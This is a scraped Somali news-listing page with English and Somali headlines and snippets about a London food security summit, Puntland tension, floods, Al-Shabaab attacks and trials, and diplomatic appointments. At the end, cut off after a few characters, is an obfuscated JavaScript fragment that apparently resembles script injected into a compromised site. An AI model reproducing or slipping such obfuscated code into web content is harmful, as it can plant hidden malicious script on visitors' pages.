Somalia’s president, UK PM co-chair global food security summit
LONDON, UK - The President of Somalia, Hassan Sheikh Mohamud, has arrived in London, the capital of the United Kingdom, where he is participating in an international conference.
"President Hassan Sheikh will hold meetings with the leaders of the world on the sidelines of the global food security summit in London," said Villa Somalia in a statement.
Hassan Sheikh is expected...
EU fears Gaza war spreading to Horn of Africa, envoy says
MANAMA, Bahrain - The spillover of the Gaza war is a concern to the Horn of Africa, especially after Al Shabab in Somalia called to unite with Hamas, a senior EU official told The National on Sunday.
Annette Weber, the EU’s envoy to the Horn of Africa, told The National on the sidelines of the Manama Dialogue in Bahrain that...
Wararkii ugu dambeeyay ee xaaladda siyaasadeed ee Maamulka Puntland
GAROOWE (SMN) - Wararka ka imaanaya gobolka Nugaal ayaa sheegaya in maanta xaalad deganaasho ah oo aan caga badan ku taagneyn laga dareemayo magaalada Garoowe ee caasimada Puntland oo ay weli ka taagan tahay xiisad xoogan.
Odayaashadhaqanka iyo waxgaradka Puntland ayaa haatan wado waan waan ay ku doonayaan inay isku soo hor fariisiyaan, oo laga baaqsado dagaal dhex mari kara...
Ra’iisul wasaaraha XFS oo booqasho ku tegay gobolka Gedo + Sawirro
DOOLOW (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa kormeer uu ugu kuur galayo xaaladda Bani’aadanimo ee ka dhalatay roobabka daadadka wata ee ka da’ay qeybo kamid ah gobollada dalka, waxa uu ku tagey degmada Doolow ee Gobolka Gedo.
Wafdiga Ra’iisul Wasaaraha ayaa waxaa garoonka diyaaradaha ee degmada Doolow ku soo dhaweeyey Madaxweyne ku-xigeenka koowaad...
Maxkamadda Ciidamada oo maanta la horgeeyay xubno ka tirsan Al-Shabaab
MUQDISHO (SMN) - Maxkamadda ciidmada Qalabka sida ayaa u fariisatay dhageysiga kiiska xubna ka tirsan Al-Shabaab, kuwaas lagu soo eedeeyay qaraxyo ka dhacay gudaha magaalada Muqdisho oo dad shacab ah ay ku dhinteen.
Maxkamadda ayaa waxaa lasoo taagay eedeysane lagu magacaabo Yuuqow Caliyow Xaaji oo lagu eedeeyay inuu Al-Shabaa u qaabilsanaa dhanka amniyaadka, uuna ka howlgalayay caasimadda, gaar ahaan waddada...
Madaxweyne Xasan Sheekh oo shir caalami ah uga qayb-galayo London
LONDON (SMN) - Magaalada London ee dalka Ingiriiska waxaa gordhow ka furmaya shir caalami ah oo ay ka qayb galayaan madax badan oo dunida ka socota, loogana hadlayo cunna-yarida dunida iyo dhibaatooyina sababa.
Shirka madaxda ka qayb galeysa waxaa ka mid ah madaxweynaha Soomaaliya Xasan Sheekh Maxamuud oo isaga iyo wedigiisu ay xalay gaareen London.
Shirkan ayaa imaanaya xilli dunida ay...
AU troops in Somalia foil Al-Shabaab attack on base – spokesman
MOGADISHU, Somalia - An overnight attack by Al Shabaab militants on the ATMIS African Union military base in the Buulo Mareer district in the Lower Shabelle region was successfully repelled, says a spokesman.
Lt Col Mwachinalo, the spokesperson of the African Union forces in AMISOM, who spoke to HOL, said that they foiled the attack, adding that there were no...
At least 50 killed by floods in Somalia as heavy rains continue
MOGADISHU, Somalia - Floods caused by heavy rains that started in early October in Somalia have killed 50 people and displaced more than half a million others, the country’s national disaster agency said.
Somalia Disaster Management Agency (SoDMA) said the torrential rains have also caused landslides and flash floods in other parts of Somalia, destroying crops and livestock.
“The floods in...
Somalia sends first-ever ambassador to Eritrea
MOGADISHU, Somalia - The President of Eritrea, Isaias Afwerki, on Sunday received the credentials of the first-ever ambassador from Somalia to Asmara as relations improve.
President Hassan Sheikh Mohamud appointed Dr. Omar Idris, who previously served as Qatar's ambassador to Somalia from 2011 to 2017 as the new envoy to Eritrea.
Somalia's new ambassador to Eritrea has posted a message on...
Sawirro: Madaxweyne Xasan Sheekh oo kulan la yeeshay safiirka dalka Kenya
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa kulan sagootin ah u sameeyay safiirka Kenya u fadhiya Soomaaliya, Maj Gen (Rtd) Thomas Chepkuto, oo dhameystay muddo xileedkiisa danjirimo.
Mudane Xasan Sheekh Maxamuud ayaa Maj Gen (Rtd) Thomas Chepkuto ku bogaadiyey shaqada wanaagsan ee ah adkeynta xiriirka Soomaaliya iyo Kenya iyo gudashada waajibaadkiisa.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return...












